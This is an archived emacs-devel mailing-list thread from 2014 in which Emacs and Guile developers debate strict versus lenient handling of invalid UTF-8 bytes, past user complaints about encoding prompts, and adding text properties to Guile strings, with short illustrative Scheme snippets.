    That wasn't what users felt, overwhelmingly.

Felt when?  About what behavior?

I asked

    > What exactly did we try before?

and you responded

    AFAIR, we tried converting raw bytes into valid non-ASCII characters,
    and perhaps also replacing them with the equivalent of u+FFFD, the
    Unicode "replacement character".

But those are both different from the proposal I'm discussing.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:36                                                     ` David Kastrup
@ 2014-10-10 14:25                                                       ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:25 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     One problem with that is that quite often Emacs' choice of a coding
    >     system for a buffer is the result of heuristics rather than dependable
    >     information.  Not making a fuzz might often be simplest.
    >
    > Could you explain what "fuzz" means here?

    You load a file, edit a line, try saving.  Emacs complains that it feels
    insecure doing so even though the line you edited is perfectly fine.

Sorry, I do not follow you.  Are you proposing a change in current
Emacs behavior?  If so, what change would that be?

    A recurring phenomenon in that direction is generation of number
    presentations that can no longer be processed because of being written
    under the influence of an LC_NUMERIC setting developers did not expect.

I am lost here.  Can you present a specific example?
Do you have a bug to report?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 14:24                                                           ` Richard Stallman
@ 2014-10-10 15:28                                                             ` Eli Zaretskii
  2014-10-11  1:15                                                               ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-10 15:28 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 10:24:36 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > I don't think we are talking about the same thing.  I am talking about Lisp
>     > functions to do conversions on text that does NOT come from files.
> 
>     ... Emacs treats all of these cases the same.
> 
> They don't HAVE to be treated the same.  We are talking about changes,
> here.

They will be very deep and invasive changes, because currently the
encoding/decoding routines don't know the purpose of the stuff they
are producing.

> But changes may not be needed.  All operations that do encoding or
> decoding allow explicit specification of the coding system.

Of course, they do.  But the issue at hand is precisely whether it is
the application's responsibility to explicitly specify conversions
that will be strict wrt invalid byte sequences, or should Emacs do
that by default.  There's no argument that there are facilities in
Emacs to do both.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 14:24                                                           ` Richard Stallman
@ 2014-10-10 15:38                                                             ` Eli Zaretskii
  2014-10-11  1:17                                                               ` Richard Stallman
       [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-10 15:38 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 10:24:37 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > Asking about invalid UTF-8 in a file could be a nuisance, but how much
>     > of a nuisance depends on the details of what we do.  Since this has
>     > some security implications, it is worth a small amount of nuisance.
> 
>     That wasn't what users felt, overwhelmingly.
> 
> Felt when?

When we tried to be more cautious about these issues than we are now.

> About what behavior?

There are several examples, and I'm not sure I recall all the details
accurately.

One such situation goes like this:

  Visit a file (or receive from another process text) that is encoded
  in Latin-1.

  Insert some text that cannot be encoded in Latin-1, and try saving
  the buffer (or sending it to a process).

Originally, Emacs would complain that Latin-1 cannot be used, and
asked the user to select a different encoding.  Then users of UTF-8
locales complained that these prompts were annoyances, that they
expect Emacs to use UTF-8 silently, without any questions, as long as
UTF-8 can encode the result.  So now that is what we do.

> I asked
> 
>     > What exactly did we try before?
> 
> and you responded
> 
>     AFAIR, we tried converting raw bytes into valid non-ASCII characters,
>     and perhaps also replacing them with the equivalent of u+FFFD, the
>     Unicode "replacement character".
> 
> But those are both different from the proposal I'm discussing.

How are they different?

In any case, I hope you are not expecting to hear about user reactions
to any of the proposals that haven't been tried yet.  Such
expectations are IMO unreasonable.  What I (and I think also David)
were trying to show is that _similar_ situations were met with user
complaints and outcry, and that we are where we are today because we
heeded to those complaints.  I see no reason to believe that user
reaction to the proposals being brought up here will be any different,
just because we tell them "it's about their security" and "trust us,
we know better".  Of course, one can reject the analogies and claim
that "this is different" and/or "this time the reaction will be
different", and there's nothing I could produce as counter-argument to
that except gut feelings based on our previous experience.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* RE: Emacs Lisp's future
       [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
@ 2014-10-10 16:02                                                               ` Drew Adams
  2014-10-10 16:10                                                                 ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Drew Adams @ 2014-10-10 16:02 UTC (permalink / raw)
  To: Eli Zaretskii, rms
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

>   Visit a file (or receive from another process text) that is
>   encoded in Latin-1. Insert some text that cannot be encoded in
>   Latin-1, and try saving the buffer (or sending it to a process).
> 
> Originally, Emacs would complain that Latin-1 cannot be used, and
> asked the user to select a different encoding.  Then users of UTF-8
> locales complained that these prompts were annoyances, that they
> expect Emacs to use UTF-8 silently, without any questions, as long
> as UTF-8 can encode the result.  So now that is what we do.

Is that preference (bother me versus silently change the encoding)
under individual-user control?

If not, why not create a user option for it?  The default behavior
can be the current behavior.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 16:02                                                               ` Drew Adams
@ 2014-10-10 16:10                                                                 ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-10 16:10 UTC (permalink / raw)
  To: Drew Adams; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 09:02:09 -0700 (PDT)
> From: Drew Adams <drew.adams@oracle.com>
> Cc: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org,
>         handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org
> 
> >   Visit a file (or receive from another process text) that is
> >   encoded in Latin-1. Insert some text that cannot be encoded in
> >   Latin-1, and try saving the buffer (or sending it to a process).
> > 
> > Originally, Emacs would complain that Latin-1 cannot be used, and
> > asked the user to select a different encoding.  Then users of UTF-8
> > locales complained that these prompts were annoyances, that they
> > expect Emacs to use UTF-8 silently, without any questions, as long
> > as UTF-8 can encode the result.  So now that is what we do.
> 
> Is that preference (bother me versus silently change the encoding)
> under individual-user control?

No, not AFAIK.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
  2014-10-06  3:34                                       ` Stephen J. Turnbull
@ 2014-10-10 20:41                                       ` Mark H Weaver
  2014-10-10 21:56                                         ` Christopher Allan Webber
  2014-10-11  1:17                                         ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-10 20:41 UTC (permalink / raw)
  To: Richard Stallman
  Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

>     Supporting property lists in Scheme raises difficult questions
>
> Do you mean text properties in strings, as in Emacs Lisp?

Yes.

Having mulled it over, I've come to the conclusion that we can add text
properties to Guile strings without adding new security risks to
competently written Scheme code, with the following caveat: text
properties must be invisible to all existing Scheme procedures,
including 'equal?' and 'write'.

However, as an exception to the caveat above, I think we can allow
existing Scheme string operations such as 'substring' and
'string-append' to propagate the text properties.

If you'd like to learn how I came to these conclusions, continue
reading, otherwise you can stop here.

* * *

Guile already supports weak-key (eq) hash tables, upon which we've
trivially implemented something called "object-properties":

  (define my-property (make-object-property))
  (set! (my-property <obj>) 'foo)
  (my-property <obj>) => foo

Effectively, this allows anyone to add a new private field to any
object.  The new field is invisible to anything that doesn't know about
the object property, including equality predicates and all other
standard procedures.

So we could use object-properties to add text properties to Guile
strings.  Therefore, we can regard it as a mere efficiency hack to add a
new field to our string objects, as long as the semantics are the same
as if the new field was an object-property.

However, this still leaves open the question of whether *propagating*
these text properties to newly-allocated strings (by 'substring',
'string-append', etc) adds new risks.

This next step makes me a bit uneasy, but I think it will also be okay,
because standard Scheme does not require 'eq?' to be usable on
characters, i.e. it does not require characters to be immediates or even
interned.

This means that we could, in principle, use object-properties to
associate text properties with the characters themselves, instead of
with the string objects.  This would quite naturally lead to them being
copied by string operations such as 'substring' and 'string-append'.

Therefore, it seems to me that adding text properties to Guile strings
does not add any security issues that are not already present in
standard Scheme.

What do you think?

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 20:41                                       ` Mark H Weaver
@ 2014-10-10 21:56                                         ` Christopher Allan Webber
  2014-10-10 22:56                                           ` Drew Adams
  2014-10-11  1:17                                         ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Christopher Allan Webber @ 2014-10-10 21:56 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, monnier,
	eliz, stephen

Mark H Weaver writes:

> Richard Stallman <rms@gnu.org> writes:
>
>>     Supporting property lists in Scheme raises difficult questions
>>
>> Do you mean text properties in strings, as in Emacs Lisp?
>
> Yes.
>
> Having mulled it over, I've come to the conclusion that we can add text
> properties to Guile strings without adding new security risks to
> competently written Scheme code, with the following caveat: text
> properties must be invisible to all existing Scheme procedures,
> including 'equal?' and 'write'.
>
> However, as an exception to the caveat above, I think we can allow
> existing Scheme string operations such as 'substring' and
> 'string-append' to propagate the text properties.
>
> If you'd like to learn how I came to these conclusions, continue
> reading, otherwise you can stop here.
>
> * * *
>
> Guile already supports weak-key (eq) hash tables, upon which we've
> trivially implemented something called "object-properties":
>
>   (define my-property (make-object-property))
>   (set! (my-property <obj>) 'foo)
>   (my-property <obj>) => foo
>
> Effectively, this allows anyone to add a new private field to any
> object.  The new field is invisible to anything that doesn't know about
> the object property, including equality predicates and all other
> standard procedures.
>
> So we could use object-properties to add text properties to Guile
> strings.  Therefore, we can regard it as a mere efficiency hack to add a
> new field to our string objects, as long as the semantics are the same
> as if the new field was an object-property.
>
> However, this still leaves open the question of whether *propagating*
> these text properties to newly-allocated strings (by 'substring',
> 'string-append', etc) adds new risks.
>
> This next step makes me a bit uneasy, but I think it will also be okay,
> because standard Scheme does not require 'eq?' to be usable on
> characters, i.e. it does not require characters to be immediates or even
> interned.
>
> This means that we could, in principle, use object-properties to
> associate text properties with the characters themselves, instead of
> with the string objects.  This would quite naturally lead to them being
> copied by string operations such as 'substring' and 'string-append'.
>
> Therefore, it seems to me that adding text properties to Guile strings
> does not add any security issues that are not already present in
> standard Scheme.
>
> What do you think?
>
>       Mark

It sounds, if I am reading this right, that the mechanism by which
properties are being added to scheme strings means that no actual
changes need to be made to Guile strings' datastructures.  If true, that
sounds like a very efficient and ideal solution because it is so
generic.

In fact, I gave it a whirl... you mean something like this?

  (define elisp-properties (make-object-property))
  
  (define (elisp-propertize string . args)
    (let ((copied-string (string-copy string)))
      (set! (elisp-properties copied-string) args)
      copied-string))
  
  (define my-monkey
    (elisp-propertize "monkey" 'eats 'bananas))
  ;; => "monkey"
  
  (elisp-properties my-monkey)
  ;; => (eats bananas)

That's awesome!  And it doesn't feel like we're changing Guile in any
core way just to accomodate elisp, and it seems bidirectionally
compatible...

But as for copying around property lists when copying strings, making
substrings, etc, I think I'm more uncomfortable with that idea using
default Guile methods.  That seems like changing the language in a
substantial way that may even have strange performance issues or
unexpected side effects... would we do such a thing if this were
anything other than Emacs?  Would we do it for Javascript?

But it doesn't seem to me like we need to worry: why not just add a
library like this:


  (use-module (language elisp string-tools))
  
  (elisp-substring (elisp-propertize "monkeys" 'eat 'bananas) 3 6)
  ;; => this would return "key", but with object properties of
  ;;    (eat bananas)
  
  (elisp-substring "monkeys" 3 6)
  ;; => this would return "key", but with no object properties

  (elisp-substring (elisp-propertize "monkeys" 'eat 'bananas) 3 6)
  ;; => this would return "key" with no object properties


The version of substring provided in emacs lisp would of course be
elisp-substring, and strings would work between guile and emacs, but as
for copying around strings with properties, only functions in guile
which care about this would have to deal with it and deal with any
related concerns.

 - Chris



^ permalink raw reply	[flat|nested] 261+ messages in thread

* RE: Emacs Lisp's future
  2014-10-10 21:56                                         ` Christopher Allan Webber
@ 2014-10-10 22:56                                           ` Drew Adams
  0 siblings, 0 replies; 261+ messages in thread
From: Drew Adams @ 2014-10-10 22:56 UTC (permalink / raw)
  To: Christopher Allan Webber, Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, monnier,
	eliz, stephen

> > Richard Stallman <rms@gnu.org> writes:
> >> Do you mean text properties in strings, as in Emacs Lisp?
> > Yes.
> >
> > Having mulled it over, I've come to the conclusion that we can add
> > text properties to Guile strings...with the following caveat: text
> > properties must be invisible to all existing Scheme procedures,
> > including 'equal?' and 'write'....
> >
> > we could, in principle, use object-properties to associate text
> > properties with the characters themselves, instead of with the
> > string objects.  This would quite naturally lead to them being
> > copied by string operations such as 'substring' and 'string-
> > append'.
> 
> ...you mean something like this?
>   (define elisp-properties (make-object-property))
>   (define (elisp-propertize string . args)
>     (let ((copied-string (string-copy string)))
>       (set! (elisp-properties copied-string) args)
>       copied-string))
>   (define my-monkey (elisp-propertize "monkey" 'eats 'bananas))
>   (elisp-properties my-monkey) ;; => (eats bananas)

How would this relate to a future Guile implementation of
Emacs-Lisp text (and overlay) properties, whose values can be
arbitrary Emacs-Lisp thingies?

I know this question jumps the gun, but can we assume that if
an Emacs user puts an arbitrary Lisp thing (e.g., a particular
cons) on some text as a text-property value that that will carry
through to the Scheme implementation in such a way that s?he
can still manipulate the data of that value (e.g. modify the
particular cons cell components)?

IOW, will an Emacs user have the same abilities, and see the
same behavior, wrt text and overlay properties as s?he has and
sees now with Emacs Lisp?



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 15:28                                                             ` Eli Zaretskii
@ 2014-10-11  1:15                                                               ` Richard Stallman
  2014-10-11  7:18                                                                 ` David Kastrup
  2014-10-11  7:18                                                                 ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-11  1:15 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > They don't HAVE to be treated the same.  We are talking about changes,
    > here.

    They will be very deep and invasive changes, because currently the
    encoding/decoding routines don't know the purpose of the stuff they
    are producing.

No, it's just a matter of setting some parameter to specify a particular
decision in decoding or encoding behavior.

    > But changes may not be needed.  All operations that do encoding or
    > decoding allow explicit specification of the coding system.

    Of course, they do.  But the issue at hand is precisely whether it is
    the application's responsibility to explicitly specify conversions
    that will be strict wrt invalid byte sequences, or should Emacs do
    that by default.

Yes.

It will be easy to specify one or the other, so why not make the default
be strict, except in the primitives that operate on files?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 20:41                                       ` Mark H Weaver
  2014-10-10 21:56                                         ` Christopher Allan Webber
@ 2014-10-11  1:17                                         ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-11  1:17 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Having mulled it over, I've come to the conclusion that we can add text
    properties to Guile strings without adding new security risks to
    competently written Scheme code, with the following caveat: text
    properties must be invisible to all existing Scheme procedures,
    including 'equal?' and 'write'.

That makes sense to me.

    However, as an exception to the caveat above, I think we can allow
    existing Scheme string operations such as 'substring' and
    'string-append' to propagate the text properties.

I agree, that's safe.  If the text property values have no effect on
the results of proper Scheme code, then whatever values Scheme
primitives put in the text properties, they can't hurt anything.

The reason why it is important to implement these at the lowest possible
level is efficiency.  If every string in Emacs had to be a higher-level
abstract object, they would surely be slower.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-10 15:38                                                             ` Eli Zaretskii
@ 2014-10-11  1:17                                                               ` Richard Stallman
  2014-10-11  7:23                                                                 ` David Kastrup
  2014-10-11  7:33                                                                 ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-11  1:17 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Originally, Emacs would complain that Latin-1 cannot be used, and
    asked the user to select a different encoding.

That is about Latin-1.  What did Emacs do, at that time, with UTF-8?

						    Then users of UTF-8
    locales complained that these prompts were annoyances, that they
    expect Emacs to use UTF-8 silently, without any questions, as long as
    UTF-8 can encode the result.

It is not clear what "As long as UTF-8 can encode the result" means,
concretely.  Whether Emacs's UTF-8 encoding can encode the raw bytes
is a matter of our decision.  Strictly speaking, UTF-8 can't encode
the raw bytes.

Thus, it seems that asking for confirmation before writing raw bytes
in UTF-8 is consistent with that expectation, and writing the raw
bytes without asking for confirmation is also consistent with that.

I am not trying to play word games with you.  I think you probably had
a more specific point in mind, but you need to present it clearly.

    >     > What exactly did we try before?
    > 
    > and you responded
    > 
    >     AFAIR, we tried converting raw bytes into valid non-ASCII characters,
    >     and perhaps also replacing them with the equivalent of u+FFFD, the
    >     Unicode "replacement character".
    > 
    > But those are both different from the proposal I'm discussing.

    How are they different?

The first of them was to convert the raw bytes into valid non-ASCII characters.
(When?  When reading the file?  When writing the file?)  You have not
described that behavior clearly, but either way it is not the same as
the proposal we are discussing now.  This proposal is to ask for
confirmation before encoding a file with raw bytes.

The second was to "replace" these codes with something else.  (When?
When reading the file?  When writing the file?)  Either way it is not
the same as the proposal we are discussing now.  This proposal does
not replace any characters.

    In any case, I hope you are not expecting to hear about user reactions
    to any of the proposals that haven't been tried yet.

That idea did not come from me.  YOU said they had already reacted to
THIS proposal.

      What I (and I think also David)
    were trying to show is that _similar_ situations were met with user
    complaints and outcry, and that we are where we are today because we
    heeded to those complaints.

There are many ways for two different designs to be "similar".  They
are also different.  The details are crucial for users' reactions.  I
think the people who objected to those behaviors, which involved
changing the file contents, might not mind the confirmation much.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:15                                                               ` Richard Stallman
@ 2014-10-11  7:18                                                                 ` David Kastrup
  2014-10-12  3:22                                                                   ` Richard Stallman
  2014-10-11  7:18                                                                 ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-11  7:18 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     > They don't HAVE to be treated the same.  We are talking about changes,
>     > here.
>
>     They will be very deep and invasive changes, because currently the
>     encoding/decoding routines don't know the purpose of the stuff they
>     are producing.
>
> No, it's just a matter of setting some parameter to specify a particular
> decision in decoding or encoding behavior.
>
>     > But changes may not be needed.  All operations that do encoding or
>     > decoding allow explicit specification of the coding system.
>
>     Of course, they do.  But the issue at hand is precisely whether it is
>     the application's responsibility to explicitly specify conversions
>     that will be strict wrt invalid byte sequences, or should Emacs do
>     that by default.
>
> Yes.
>
> It will be easy to specify one or the other, so why not make the default
> be strict, except in the primitives that operate on files?

Because we had that already.  It made the users mad, it threw spanners
in the work of the programmers, and there is a large body of software
developed before then and since then that depends on Emacs working
rather than throwing a fit.

When we lost users in large droves to XEmacs at the time Emacs became
the loss leader for multibyte encodings by making MULE manadatory, a
significant number of those users who went were the ones not even using
non-ASCII locales, and they would purportedly not even have noticed a
difference with the files they were supposed to be working with.  But in
practice, files and communications don't pass the purity tests.

When you have a secretary working for you, you are not interested in the
secretary getting each grammatical error in a letter you got sent
circled in red.

When I read a mail from an issue ticketing system that has not
encoded/decoded some mail headers properly along with the rest, I still
want to be able to read what is there _before_ making decisions about
encodings.  Most of the time I don't want to make _any_ decision and
just go ahead with what I got.  And frankly: if Emacs refuses to show me
what it got before I make a decision, I have no _base_ for making a
decision in the first place.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:15                                                               ` Richard Stallman
  2014-10-11  7:18                                                                 ` David Kastrup
@ 2014-10-11  7:18                                                                 ` Eli Zaretskii
  2014-10-11 23:51                                                                   ` Mark H Weaver
  2014-10-12  3:24                                                                   ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-11  7:18 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 21:15:26 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > They don't HAVE to be treated the same.  We are talking about changes,
>     > here.
> 
>     They will be very deep and invasive changes, because currently the
>     encoding/decoding routines don't know the purpose of the stuff they
>     are producing.
> 
> No, it's just a matter of setting some parameter to specify a particular
> decision in decoding or encoding behavior.

Specify, and then drag it all the way down the encoding/decoding
machinery.

>     > But changes may not be needed.  All operations that do encoding or
>     > decoding allow explicit specification of the coding system.
> 
>     Of course, they do.  But the issue at hand is precisely whether it is
>     the application's responsibility to explicitly specify conversions
>     that will be strict wrt invalid byte sequences, or should Emacs do
>     that by default.
> 
> Yes.
> 
> It will be easy to specify one or the other, so why not make the default
> be strict, except in the primitives that operate on files?

Because I believe this will annoy users and cause a lot of
complaining.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:17                                                               ` Richard Stallman
@ 2014-10-11  7:23                                                                 ` David Kastrup
  2014-10-11  7:33                                                                 ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-11  7:23 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> There are many ways for two different designs to be "similar".  They
> are also different.  The details are crucial for users' reactions.  I
> think the people who objected to those behaviors, which involved
> changing the file contents, might not mind the confirmation much.

That kind of choice would require the assumption that any file operation
(and any other encoding/decoding action) is an immediate, direct, and
obvious consequence of a user interaction with Emacs.

That is not the case, and it has never been.  And even where it is the
case, there is nothing to be gained by letting Emacs refuse viewing
files.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  1:17                                                               ` Richard Stallman
  2014-10-11  7:23                                                                 ` David Kastrup
@ 2014-10-11  7:33                                                                 ` Eli Zaretskii
  2014-10-12  3:22                                                                   ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-11  7:33 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Fri, 10 Oct 2014 21:17:15 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     Originally, Emacs would complain that Latin-1 cannot be used, and
>     asked the user to select a different encoding.
> 
> That is about Latin-1.  What did Emacs do, at that time, with UTF-8?

The situation I described is with text encodable by UTF-8, but not by
Latin-1.  So it has no analogue when UTF-8 is used to begin with.

> 						    Then users of UTF-8
>     locales complained that these prompts were annoyances, that they
>     expect Emacs to use UTF-8 silently, without any questions, as long as
>     UTF-8 can encode the result.
> 
> It is not clear what "As long as UTF-8 can encode the result" means,
> concretely.  Whether Emacs's UTF-8 encoding can encode the raw bytes
> is a matter of our decision.  Strictly speaking, UTF-8 can't encode
> the raw bytes.

I wasn't talking about raw bytes, I was talking about characters
outside of Latin-1 charset, like Cyrillic or Polish.

>     >     > What exactly did we try before?
>     > 
>     > and you responded
>     > 
>     >     AFAIR, we tried converting raw bytes into valid non-ASCII characters,
>     >     and perhaps also replacing them with the equivalent of u+FFFD, the
>     >     Unicode "replacement character".
>     > 
>     > But those are both different from the proposal I'm discussing.
> 
>     How are they different?
> 
> The first of them was to convert the raw bytes into valid non-ASCII characters.
> (When?  When reading the file?  When writing the file?)  You have not
> described that behavior clearly, but either way it is not the same as
> the proposal we are discussing now.  This proposal is to ask for
> confirmation before encoding a file with raw bytes.

Our experience with such prompts is that they are perceived as
annoyances, no matter whether they happen at read or at write time.

> The second was to "replace" these codes with something else.  (When?
> When reading the file?  When writing the file?)  Either way it is not
> the same as the proposal we are discussing now.  This proposal does
> not replace any characters.

What will Emacs do, under this proposal, if the user is asked whether
to keep the original raw bytes and answers NO?  I thought Emacs will
replace those invalid sequences with something, therefore I reminded
what happened last time we tried something similar.

Moreover, I think at least some of the suggestions in this thread,
perhaps not from you, were not to ask any questions at all, and
"handle" these invalid sequences automatically when Emacs reads the
text from its source, whatever that is.  Under that suggestion, the
only reasonable behavior is to replace the invalid sequences with
special valid characters, such as u+FFFD, which resembles what we
tried doing in the past.

>     In any case, I hope you are not expecting to hear about user reactions
>     to any of the proposals that haven't been tried yet.
> 
> That idea did not come from me.  YOU said they had already reacted to
> THIS proposal.

Then my imperfect wording caused your misunderstanding, for which I'm
sorry.

>       What I (and I think also David)
>     were trying to show is that _similar_ situations were met with user
>     complaints and outcry, and that we are where we are today because we
>     heeded to those complaints.
> 
> There are many ways for two different designs to be "similar".  They
> are also different.  The details are crucial for users' reactions.  I
> think the people who objected to those behaviors, which involved
> changing the file contents, might not mind the confirmation much.

Well, this is where we disagree, and as I mentioned, such
disagreements cannot be reconciled when our degrees of reliance on
past experience in similar situations is different.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  6:21                                       ` Mark H Weaver
  2014-10-06 15:08                                         ` Eli Zaretskii
@ 2014-10-11 18:34                                         ` Florian Weimer
  1 sibling, 0 replies; 261+ messages in thread
From: Florian Weimer @ 2014-10-11 18:34 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, eliz, stephen

* Mark H. Weaver:

> To give an example, consider a procedure that needs to pass a string
> from an untrusted source to an SQL query.  To do this safely, it needs
> to quote the string.  I haven't researched how to properly quote SQL
> string literals, but in general, quoting is typically done by
> recognizing some set of special characters that must be escaped, and
> allowing all other characters through unmodified.

For are truly robust solution, you need parameterized queries.  Most
database servers support other encodings besides UTF-8, and the
required quoting logic can be quite complicated.

> However, "raw byte" code points can be used to bypass such a quoting
> mechanism, and thus send an unescaped closing quote to the SQL database
> followed by arbitrary SQL commands.

This can happen with certain multi-byte character sets as well.

> UTF-8 decoders are supposed to detect and reject these "overlong"
> encodings, but it is likely that many programs fail to do this.

That's not very common anymore.

> To cope with this, the Unicode standards require that UTF-8 codecs
> reject overlong encodings and other invalid byte sequences.  This is in
> direct conflict with the idea of "raw byte" code points, whose purpose
> is to be tolerant of arbitrary byte sequences and to propagate them
> unchanged.

The charset conversion functionality could support binary-transparent
UTF-8 and pure UTF-8 at output boundaries.  This way, the application
can make a choice.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 23:11                                                               ` Mark H Weaver
  2014-10-08  3:03                                                                 ` David Kastrup
